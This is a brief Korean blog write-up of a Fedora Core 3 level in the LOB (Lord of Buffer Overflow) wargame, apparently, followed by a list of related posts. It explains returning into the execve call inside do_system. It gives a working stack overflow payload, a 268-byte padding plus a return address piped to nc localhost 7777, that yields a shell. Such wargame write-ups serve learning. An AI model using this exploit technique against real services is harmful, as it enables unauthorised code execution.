스킵했다가 이제야 올리네요;;허허
코드는 음 sfp overwrite 막고, 끝이네여
그 system 내부에 do_system 이라는 함수가 있는데 do_system 에서 execve 를 이용해 shell+인자 구성을 해줍니다.
고로 do_system 에서 execve를 call 하는 부분을 찾아서 이부분으로 eip를 돌리면 명령어 치는대로 실행 될거에요
저기 보이는 저 주소에요 계획은 LOB 1번 보시고 오면 되고 공격 ㄱㄱ
(python -c 'print "A"*268 + "\x84\x07\x75\x00"';cat) | nc localhost 7777
Y3S~~! FC3 끝
'Pwnable > LOB' 카테고리의 다른 글
| [LOB FC4 - level 2] cruel-> enigma (0) | 2017.07.27 |
|---|---|
| [LOB FC4 - level1] dark_stone->cruel (0) | 2017.06.27 |
| 클리어 (0) | 2017.06.27 |
| [LOB FC3 - Level5] evil_wizard -> dark_stone (0) | 2017.06.23 |
| [LOB FC3 - level4] hell_fire -> evil_wizard (0) | 2017.06.12 |